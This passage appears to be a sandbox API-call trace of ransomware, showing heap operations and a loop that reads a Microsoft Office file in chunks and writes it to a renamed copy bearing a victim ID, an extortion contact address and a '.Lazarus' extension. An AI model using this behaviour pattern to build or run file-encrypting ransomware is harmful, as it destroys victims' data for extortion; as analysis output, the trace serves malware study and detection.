lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.947] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0101.947] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0101.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.947] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0101.947] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.947] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.947] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0101.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0101.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0101.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0101.947] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0101.947] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0101.947] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.947] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0101.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0101.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.947] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.947] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0101.947] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0101.947] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.947] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.947] AreFileApisANSI () returned 1 [0101.947] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8b110 [0101.947] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x8b110, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\OSE.EXE") returned 69 [0101.947] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\OSE.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\source engine\\ose.exe"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dbd6700, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0x4accd6e1, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x5dbd6700, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0x3ba48)) returned 1 [0101.948] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b110 | out: hHeap=0x20000) returned 1 [0101.948] AreFileApisANSI () returned 1 [0101.948] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0101.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.948] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.948] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.948] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0101.948] GetLastError () returned 0x0 [0101.948] SetLastError (dwErrCode=0x0) [0101.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4dfc0 [0101.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x570e0 [0101.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b8b0 [0101.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6c0 [0101.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d798 [0101.948] GetLastError () returned 0x0 [0101.948] SetLastError (dwErrCode=0x0) [0101.948] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0101.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0101.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x77) returned 0x6a3b0 [0101.948] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0101.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb2) returned 0x4ebc8 [0101.948] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0101.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0101.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0101.949] AreFileApisANSI () returned 1 [0101.949] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ebc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 131 [0101.949] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x106) returned 0x8b9c8 [0101.949] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ebc8, cbMultiByte=-1, lpWideCharStr=0x8b9c8, cchWideChar=131 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\OSE.EXE.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 131 [0101.949] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\OSE.EXE.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\source engine\\ose.exe.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0101.949] GetFileType (hFile=0x27c) returned 0x1 [0101.949] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b9c8 | out: hHeap=0x20000) returned 1 [0101.949] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0101.949] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0101.950] AreFileApisANSI () returned 1 [0101.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8aa88 [0101.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x8aa88, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\OSE.EXE") returned 69 [0101.950] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\OSE.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\source engine\\ose.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0101.950] GetFileType (hFile=0x368) returned 0x1 [0101.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aa88 | out: hHeap=0x20000) returned 1 [0101.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a4b0 [0101.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0101.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0101.950] GetLastError () returned 0x0 [0101.950] SetLastError (dwErrCode=0x0) [0101.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0101.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0101.950] GetLastError () returned 0x0 [0101.950] SetLastError (dwErrCode=0x0) [0101.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0101.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34eb0 [0101.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x986d0 [0101.950] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0101.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0101.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d540 [0101.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x996d8 [0101.953] GetLastError () returned 0x0 [0101.953] SetLastError (dwErrCode=0x0) [0101.953] GetLastError () returned 0x0 [0101.953] SetLastError (dwErrCode=0x0) [0101.953] GetLastError () returned 0x0 [0101.953] SetLastError (dwErrCode=0x0) [0101.954] GetLastError () returned 0x0 [0101.954] SetLastError (dwErrCode=0x0) [0101.954] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.954] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.955] GetLastError () returned 0x0 [0101.956] SetLastError (dwErrCode=0x0) [0101.956] GetLastError () returned 0x0 [0101.956] SetLastError (dwErrCode=0x0) [0101.956] GetLastError () returned 0x0 [0101.956] SetLastError (dwErrCode=0x0) [0101.956] GetLastError () returned 0x0 [0101.956] SetLastError (dwErrCode=0x0) [0101.956] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.956] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.957] GetLastError () returned 0x0 [0101.957] SetLastError (dwErrCode=0x0) [0101.957] GetLastError () returned 0x0 [0101.957] SetLastError (dwErrCode=0x0) [0101.957] GetLastError () returned 0x0 [0101.957] SetLastError (dwErrCode=0x0) [0101.957] GetLastError () returned 0x0 [0101.957] SetLastError (dwErrCode=0x0) [0101.957] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.957] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.958] GetLastError () returned 0x0 [0101.958] SetLastError (dwErrCode=0x0) [0101.958] GetLastError () returned 0x0 [0101.958] SetLastError (dwErrCode=0x0) [0101.958] GetLastError () returned 0x0 [0101.958] SetLastError (dwErrCode=0x0) [0101.958] GetLastError () returned 0x0 [0101.958] SetLastError (dwErrCode=0x0) [0101.958] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.958] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.958] GetLastError () returned 0x0 [0101.959] SetLastError (dwErrCode=0x0) [0101.959] GetLastError () returned 0x0 [0101.959] SetLastError (dwErrCode=0x0) [0101.959] GetLastError () returned 0x0 [0101.959] SetLastError (dwErrCode=0x0) [0101.959] GetLastError () returned 0x0 [0101.959] SetLastError (dwErrCode=0x0) [0101.959] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.959] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.959] GetLastError () returned 0x0 [0101.959] SetLastError (dwErrCode=0x0) [0101.960] GetLastError () returned 0x0 [0101.960] SetLastError (dwErrCode=0x0) [0101.960] GetLastError () returned 0x0 [0101.960] SetLastError (dwErrCode=0x0) [0101.960] GetLastError () returned 0x0 [0101.960] SetLastError (dwErrCode=0x0) [0101.960] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.960] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.960] GetLastError () returned 0x0 [0101.960] SetLastError (dwErrCode=0x0) [0101.960] GetLastError () returned 0x0 [0101.961] SetLastError (dwErrCode=0x0) [0101.961] GetLastError () returned 0x0 [0101.961] SetLastError (dwErrCode=0x0) [0101.961] GetLastError () returned 0x0 [0101.961] SetLastError (dwErrCode=0x0) [0101.961] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.961] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.961] GetLastError () returned 0x0 [0101.961] SetLastError (dwErrCode=0x0) [0101.961] GetLastError () returned 0x0 [0101.962] SetLastError (dwErrCode=0x0) [0101.962] GetLastError () returned 0x0 [0101.962] SetLastError (dwErrCode=0x0) [0101.962] GetLastError () returned 0x0 [0101.962] SetLastError (dwErrCode=0x0) [0101.962] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.962] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.962] GetLastError () returned 0x0 [0101.962] SetLastError (dwErrCode=0x0) [0101.962] GetLastError () returned 0x0 [0101.962] SetLastError (dwErrCode=0x0) [0101.962] GetLastError () returned 0x0 [0101.963] SetLastError (dwErrCode=0x0) [0101.963] GetLastError () returned 0x0 [0101.963] SetLastError (dwErrCode=0x0) [0101.963] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.963] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.963] GetLastError () returned 0x0 [0101.963] SetLastError (dwErrCode=0x0) [0101.963] GetLastError () returned 0x0 [0101.963] SetLastError (dwErrCode=0x0) [0101.963] GetLastError () returned 0x0 [0101.963] SetLastError (dwErrCode=0x0) [0101.964] GetLastError () returned 0x0 [0101.964] SetLastError (dwErrCode=0x0) [0101.964] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.964] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.964] GetLastError () returned 0x0 [0101.964] SetLastError (dwErrCode=0x0) [0101.964] GetLastError () returned 0x0 [0101.964] SetLastError (dwErrCode=0x0) [0101.964] GetLastError () returned 0x0 [0101.964] SetLastError (dwErrCode=0x0) [0101.965] GetLastError () returned 0x0 [0101.965] SetLastError (dwErrCode=0x0) [0101.965] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.965] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.965] GetLastError () returned 0x0 [0101.965] SetLastError (dwErrCode=0x0) [0101.965] GetLastError () returned 0x0 [0101.965] SetLastError (dwErrCode=0x0) [0101.965] GetLastError () returned 0x0 [0101.965] SetLastError (dwErrCode=0x0) [0101.965] GetLastError () returned 0x0 [0101.966] SetLastError (dwErrCode=0x0) [0101.966] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.966] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.966] GetLastError () returned 0x0 [0101.966] SetLastError (dwErrCode=0x0) [0101.966] GetLastError () returned 0x0 [0101.966] SetLastError (dwErrCode=0x0) [0101.966] GetLastError () returned 0x0 [0101.966] SetLastError (dwErrCode=0x0) [0101.966] GetLastError () returned 0x0 [0101.966] SetLastError (dwErrCode=0x0) [0101.966] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.967] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.967] GetLastError () returned 0x0 [0101.967] SetLastError (dwErrCode=0x0) [0101.967] GetLastError () returned 0x0 [0101.967] SetLastError (dwErrCode=0x0) [0101.967] GetLastError () returned 0x0 [0101.967] SetLastError (dwErrCode=0x0) [0101.967] GetLastError () returned 0x0 [0101.967] SetLastError (dwErrCode=0x0) [0101.967] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.970] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.970] GetLastError () returned 0x0 [0101.970] SetLastError (dwErrCode=0x0) [0101.970] GetLastError () returned 0x0 [0101.970] SetLastError (dwErrCode=0x0) [0101.970] GetLastError () returned 0x0 [0101.970] SetLastError (dwErrCode=0x0) [0101.970] GetLastError () returned 0x0 [0101.970] SetLastError (dwErrCode=0x0) [0101.970] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.970] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.971] GetLastError () returned 0x0 [0101.971] SetLastError (dwErrCode=0x0) [0101.971] GetLastError () returned 0x0 [0101.971] SetLastError (dwErrCode=0x0) [0101.971] GetLastError () returned 0x0 [0101.971] SetLastError (dwErrCode=0x0) [0101.971] GetLastError () returned 0x0 [0101.971] SetLastError (dwErrCode=0x0) [0101.971] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.971] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.972] GetLastError () returned 0x0 [0101.972] SetLastError (dwErrCode=0x0) [0101.972] GetLastError () returned 0x0 [0101.972] SetLastError (dwErrCode=0x0) [0101.972] GetLastError () returned 0x0 [0101.972] SetLastError (dwErrCode=0x0) [0101.972] GetLastError () returned 0x0 [0101.972] SetLastError (dwErrCode=0x0) [0101.972] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.972] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.973] GetLastError () returned 0x0 [0101.973] SetLastError (dwErrCode=0x0) [0101.973] GetLastError () returned 0x0 [0101.973] SetLastError (dwErrCode=0x0) [0101.973] GetLastError () returned 0x0 [0101.973] SetLastError (dwErrCode=0x0) [0101.973] GetLastError () returned 0x0 [0101.973] SetLastError (dwErrCode=0x0) [0101.973] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.973] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.974] GetLastError () returned 0x0 [0101.974] SetLastError (dwErrCode=0x0) [0101.974] GetLastError () returned 0x0 [0101.974] SetLastError (dwErrCode=0x0) [0101.974] GetLastError () returned 0x0 [0101.974] SetLastError (dwErrCode=0x0) [0101.974] GetLastError () returned 0x0 [0101.974] SetLastError (dwErrCode=0x0) [0101.974] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.974] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.974] GetLastError () returned 0x0 [0101.974] SetLastError (dwErrCode=0x0) [0101.975] GetLastError () 